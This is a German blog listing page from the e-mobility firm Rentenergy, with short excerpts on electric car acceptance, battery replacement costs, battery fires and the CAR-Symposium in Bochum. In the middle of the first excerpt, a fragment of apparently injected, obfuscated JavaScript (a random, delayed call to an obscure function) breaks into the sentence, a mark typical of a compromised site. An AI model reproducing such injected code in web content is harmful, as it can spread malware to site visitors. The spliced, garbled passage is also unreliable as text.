Mehr Akzeptanz durch höhere Subventionen? Das funktioniert nicht!

Zu teure und unpraktisch gebaute Elektroautos wollen die wenigstens Menschen kaufen. „Hilft ja nichts, machen wir eben etwas andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderes“, sollte die Automobilindustrie

Share
Ein neuer Akku für 17.000 Euro

Es ist ein Ärgernis mit den fest verbauten Akkus in E-Autos. Dass ihre Lebensdauer begrenzt und ihr Austausch technisch sowie wirtschaftlich (beinahe) unmöglich ist, lässt E-Fahrzeuge auf dem Gerauchtwagenmarkt künftig

Share
Mehr Sicherheit wenn es brenzlig wird

„Elektroantriebe sind für die Feuerwehr zunächst keine Verheißung, sondern ein ungelöstes Problem. Denn bisher ist nicht klar, wie eine brennende Batterie gelöscht werden kann.“ Brennende Lithium-Ionen-Batterien sind eine große Herausforderung

Share
Rentenergy zu Gast beim CAR-Symposium in Bochum

Rentenergy-CEO Dirk Kieslich hatte die Gelegenheit beim CAR-Symposium in Bochum viel Neues aus dem weitreichenden Themengebiete der E-Mobilität zu hören.

Share
RentEnergy – eMobility Solutions

Elektromobilität ist weltweit der Schlüssel klimafreundlicher Mobilität.Der Betrieb von Elektrofahrzeugen erzeugt insbesondere in Verbindung mit regenerativ erzeugtem Strom deutlich weniger CO2.Wir möchten Ihnen hier das bahnbrechende Konzept von Rentenergy vorstellen.

Share
Rentenergy stellt sich beim CAR-Symposium vor

Thema: Hochlauf der Elektromobilität in Europa Dirk Kieslich, CEO und Founder von Rentenergy®, ist zu Gast beim CAR-Symposium am 6. und 7. Februar im Ruhrcongress Bochum.Das „Get togehter“ der Automobilhersteller

Share